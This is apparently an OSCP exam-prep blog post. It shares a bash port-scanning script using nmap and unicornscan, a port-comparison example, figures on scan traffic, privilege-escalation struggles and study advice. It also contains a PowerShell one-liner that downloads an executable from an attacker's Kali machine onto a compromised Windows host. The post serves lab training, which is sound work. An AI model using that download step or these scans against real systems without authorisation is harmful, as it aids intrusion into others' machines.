OSCP Journey Part 9

Day: -44
PDF: 90%
Videos: 95%
Boxes: 7

So, seven boxes down; I currently have low priv on the 8th, and have spent approx. 4 days getting low priv thanks to a sneaky port choice. Took a break yesterday from the box to work on an initial scan script that would pick up something like that in future. I would have a lot more boxes completed if I could use Metasploit! But I can’t rely on it in the exam, so I’m not using it in the lab (other than multi/handler and the payloads listed in my previous post).

#!/bin/bash
# Usage: ./scanner.sh <IP ADDRESS>
if [[ -z "$1" ]]; then
        echo "USAGE: ./scanner.sh [IP ADDRESS]"
        exit 1
fi
ip="$1"

echo "---------HAVE YOU BOUNCED THE BOX??----------------"
# Quick scan of the 100 most common ports so you can start working on the box straight away
nmap "$ip" -F -oN "quick$ip"

echo "if this takes longer than 10 mins re run scan. Possibly restart box."
# Full TCP connect scan of all 65535 ports
nmap "$ip" -p- -sT -oN "tcpall$ip" -T4

# Second opinion from a different tool (:a = all ports)
unicornscan "$ip:a" > "uniall$ip"
echo "EXTRACTING PORTS FROM quick$ip and tcpall$ip"
cat "quick$ip" "tcpall$ip" | grep open | cut -d" " -f1 | sort -u
echo "VIEWING uniall$ip"
cat "uniall$ip"

Let me know if you use it, find it useful, or have suggestions for improving it.

Even though the Nmap book says -sS scans are quicker, I’ve found this not to be the case; -sT scans have been quicker for me.

The script gives you a quick scan of the 100 most common ports and outputs that so you can begin working on a box, i.e. if it’s found a web server, go and view the web page while the -sT scan is running. The -sT scan run at -T4 has been the most reliable in testing; -T5 has missed ports, and -T3 (the default when you run nmap) is a bit too slow, though very reliable. The unicornscan is a quick check of the other two scans, as it’s always good to use a different tool to verify findings.

Now I’m sure there are ways to improve this script as it’s very basic, but so far it’s been quite solid for me. The only thing I would say is that I couldn’t figure out how to grep the output of unicornscan.
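As an added example (not part of the original post or the script above), here is one way to pull the open ports out of both the nmap -oN files and the unicornscan output and then list the ports only one of the two tools reported, which is exactly the cross-check the script is meant to give you. The two sample outputs are constructed, and the unicornscan line layout ("TCP open  service[ port]  from ip  ttl n") is assumed from its default output format.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: extract open TCP ports from
# nmap -oN output and from unicornscan output, then list the ports that only
# one tool reported (those are the ones worth re-scanning by hand).
# Both samples are constructed; the unicornscan line layout is an assumption.

NMAP_SAMPLE='# Nmap 7.70 scan initiated as: nmap -sT -p- -T4 -oN tcpall192.0.2.10 192.0.2.10
Nmap scan report for 192.0.2.10
Host is up (0.12s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
139/tcp   filtered netbios-ssn
443/tcp   open     https
8080/tcp  open     http-proxy'

UNICORN_SAMPLE='TCP open                     ssh[   22]         from 192.0.2.10  ttl 64
TCP open                    http[   80]         from 192.0.2.10  ttl 64
TCP open                   https[  443]         from 192.0.2.10  ttl 64
TCP open                   mysql[ 3306]         from 192.0.2.10  ttl 64'

# nmap -oN line: "<port>/tcp   open   <service>" -> keep only the port number.
# Lists are sorted lexicographically (not numerically) so that comm can use them.
nmap_open_ports() {
    grep -E '^[0-9]+/tcp +open' | cut -d/ -f1 | sort -u
}

# unicornscan line: "TCP open   <service>[ <port>]  from <ip>  ttl <n>" -> port number.
unicorn_open_ports() {
    grep -E '^TCP open' | sed -E 's/.*\[ *([0-9]+)\].*/\1/' | sort -u
}

# $1 = nmap -oN text, $2 = unicornscan text, $3 = comm flag:
# -23 keeps ports only in the nmap list, -13 ports only in the unicornscan list.
_port_diff() {
    a=$(mktemp); b=$(mktemp)
    printf '%s\n' "$1" | nmap_open_ports > "$a"
    printf '%s\n' "$2" | unicorn_open_ports > "$b"
    comm "$3" "$a" "$b"
    rm -f "$a" "$b"
}
only_in_nmap()    { _port_diff "$1" "$2" -23; }
only_in_unicorn() { _port_diff "$1" "$2" -13; }

echo "Open per nmap but not unicornscan:"; only_in_nmap "$NMAP_SAMPLE" "$UNICORN_SAMPLE"
echo "Open per unicornscan but not nmap:"; only_in_unicorn "$NMAP_SAMPLE" "$UNICORN_SAMPLE"
```

On real files, feed them in with `nmap_open_ports < tcpall$ip` and `only_in_nmap "$(cat tcpall$ip)" "$(cat uniall$ip)"`.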

Some interesting nmap scan stats I’ve put together (traffic generated per host, and the same scan extrapolated across a /24):

Scan                                           Network impact   Against /24
nmap -F $ip                                    0.005436MB       1.38MB
nmap --top-ports 20 $ip                        0.014MB          3.57MB
nmap -p- $ip                                   2.971MB          757.60MB
nmap -A $ip                                    2.399MB          611.74MB
nmap -p 139,443 --script=smb-vuln* $ip         0.12MB           30.60MB

So really think about what scan you want to run on a network, because as you can see, if you scan a whole range you will definitely affect the network with the load you are putting on it.

My current struggle is Windows priv esc. I’ve used Windows Exploit Suggester, but every exploit I try doesn’t work. I’m obviously not doing something correctly, or the Offsec admins have manually patched the vulnerability it’s suggesting.

Nice one-liner to put files on a Windows machine with PowerShell:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://kaliboxip/AFILE.exe','C:\Users\USERYOURLOGGEDINAS\Desktop\AFILE.exe')"

To those reading this who have not started or are thinking about it: seriously take the time to explore Hack The Box and VulnHub, and really think about the tools you’re using and the exploits you’ve used. Refine your method, get very comfortable with nmap, especially the scripting engine. Learn to get stuck and fed up and want to give up – but keep at it until you pwn that box. Document what you have learned from the box – don’t think ‘it’s okay, I’ll remember that’. You won’t – believe me. There have been quite a few times I’ve forgotten something and popped on to where I’ve documented it on this site as a reminder.

Lastly, I’ve booked the exam date… and accepted my fate of not passing on this attempt. I will eventually pass this exam; I have set my mind to that, and I don’t care how long it will take me.

I hope this blog helps someone who has read other blogs about how they pwned all the boxes in 2 days (exaggeration) and passed first time.

1 Response

  1. It is really helping me bro… please don’t stop publishing posts… and I am really marking each point you are saying, especially the external resources (g0tmi1k, fuzzy security, pentest.ws) and all commands too
